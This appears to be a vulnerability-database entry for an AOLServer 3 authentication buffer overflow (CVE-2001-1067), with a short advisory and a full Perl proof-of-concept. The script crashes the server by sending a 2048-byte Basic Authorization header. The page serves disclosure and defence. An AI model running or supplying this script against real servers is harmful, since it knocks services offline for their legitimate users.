Lucene search
+L

AOLServer 3 - 'Authentication String' Remote Buffer Overflow (1)

🗓️ 22 Aug 2001 00:00:00Reported by Nate HaggardType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

AOLServer 3 suffers remote buffer overflow due to improper password handling, risking local access.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
AOLServer Multiple Remote Vulnerabilities
25 Mar 200500:00
nessus
cve
CVE
CVE-2001-1067
9 Mar 200205:00
cve
cvelist
Cvelist
CVE-2001-1067
9 Mar 200205:00
cvelist
exploitdb
Exploit DB
AOLServer 3 - 'Authentication String' Remote Buffer Overflow (2)
5 Sep 200100:00
exploitdb
nvd
NVD
CVE-2001-1067
31 Aug 200104:00
nvd
cert
CERT
AOLServer contains buffer overflow in ParseAuth()
26 Sep 200100:00
cert
source: https://www.securityfocus.com/bid/3230/info

AOLServer is a freely available, open source web server. It was originally written by AOL, and is currently developed and maintained by AOL and public domain.

A problem has been discovered that can allow remote users to crash an AOLServer, denying service to legitimate users of the system. The problem is due to the handling of passwords. It is possible for a remote user to overflow a buffer within the AOLServer process by sending a password of 2048 bytes. This could result in the overwriting of stack variables, including the return address.

This makes it possible for a remote user to execute arbitrary code with the privileges of the AOLServer process, and potentially gain local access.

#!/usr/bin/perl

## Nate Haggard <[email protected]>
## AOLserver 3.0 vulnerability
## August 22, 2001

use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host\n" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Sep 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.1611
30